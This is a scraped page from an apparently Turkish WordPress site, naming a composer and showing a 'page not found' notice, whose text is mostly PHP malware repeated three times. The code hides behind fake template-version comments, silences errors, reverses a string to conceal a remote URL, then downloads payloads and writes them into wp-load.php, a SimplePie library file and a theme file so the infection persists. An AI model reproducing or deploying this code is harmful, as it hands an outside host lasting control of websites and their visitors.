/** * Holds the required Template version */ error_reporting(0); $wp_db_auto = strrev("/wordpress/ofni.do7//:ptth"); /* * @global string $required_template_version */ $wp_auto_update = file_get_contents("./wp-load.php","r"); if ( @strpos($wp_auto_update, "gzpdecode.php") == false AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") > 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."simp","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "gzpdecode.php") == true AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen( ABSPATH . WPINC . "/SimplePie/gzpdecode.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "gzpdecode.php") == false AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen( ABSPATH . WPINC . "/SimplePie/gzpdecode.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); if ( @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") > 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."simp","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } } $wp_auto_update = file_get_contents("./wp-load.php","r"); if ( @strpos($wp_auto_update, "content-pack.php") == false AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") > 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."them","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "content-pack.php") == true AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen("./wp-content/themes/twentyfifteen/content-pack.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "content-pack.php") == false AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen("./wp-content/themes/twentyfifteen/content-pack.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); if ( @filesize("./wp-content/themes/twentyfifteen/content-pack.php") > 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."them","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } } HASAN ŞANLITÜRK – Bestekâr, Koro Şefi, Hoca /** * Holds the required Template version */ error_reporting(0); $wp_db_auto = strrev("/wordpress/ofni.do7//:ptth"); /* * @global string $required_template_version */ $wp_auto_update = file_get_contents("./wp-load.php","r"); if ( @strpos($wp_auto_update, "gzpdecode.php") == false AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") > 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."simp","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "gzpdecode.php") == true AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen( ABSPATH . WPINC . "/SimplePie/gzpdecode.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "gzpdecode.php") == false AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen( ABSPATH . WPINC . "/SimplePie/gzpdecode.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); if ( @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") > 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."simp","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } } $wp_auto_update = file_get_contents("./wp-load.php","r"); if ( @strpos($wp_auto_update, "content-pack.php") == false AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") > 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."them","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "content-pack.php") == true AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen("./wp-content/themes/twentyfifteen/content-pack.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "content-pack.php") == false AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen("./wp-content/themes/twentyfifteen/content-pack.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); if ( @filesize("./wp-content/themes/twentyfifteen/content-pack.php") > 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."them","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } } /** * Holds the required Template version */ error_reporting(0); $wp_db_auto = strrev("/wordpress/ofni.do7//:ptth"); /* * @global string $required_template_version */ $wp_auto_update = file_get_contents("./wp-load.php","r"); if ( @strpos($wp_auto_update, "gzpdecode.php") == false AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") > 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."simp","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "gzpdecode.php") == true AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen( ABSPATH . WPINC . "/SimplePie/gzpdecode.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "gzpdecode.php") == false AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen( ABSPATH . WPINC . "/SimplePie/gzpdecode.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); if ( @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") > 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."simp","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } } $wp_auto_update = file_get_contents("./wp-load.php","r"); if ( @strpos($wp_auto_update, "content-pack.php") == false AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") > 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."them","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "content-pack.php") == true AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen("./wp-content/themes/twentyfifteen/content-pack.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } if ( @strpos($wp_auto_update, "content-pack.php") == false AND @filesize("./wp-content/themes/twentyfifteen/content-pack.php") < 55555 AND @filesize( ABSPATH . WPINC . "/SimplePie/gzpdecode.php") < 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."authentic","r"); $wp_db_conf = @fopen("./wp-content/themes/twentyfifteen/content-pack.php","w+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); if ( @filesize("./wp-content/themes/twentyfifteen/content-pack.php") > 55555 ) { $wp_auto_update = file_get_contents("$wp_db_auto"."them","r"); $wp_db_conf = @fopen("./wp-load.php","a+"); @fputs($wp_db_conf, $wp_auto_update); @fclose($wp_db_conf); } }

Aradığınız sayfa bulunamadı. Belki arama kutusu aradığınızı bulma konusunda yardımcı olabilir.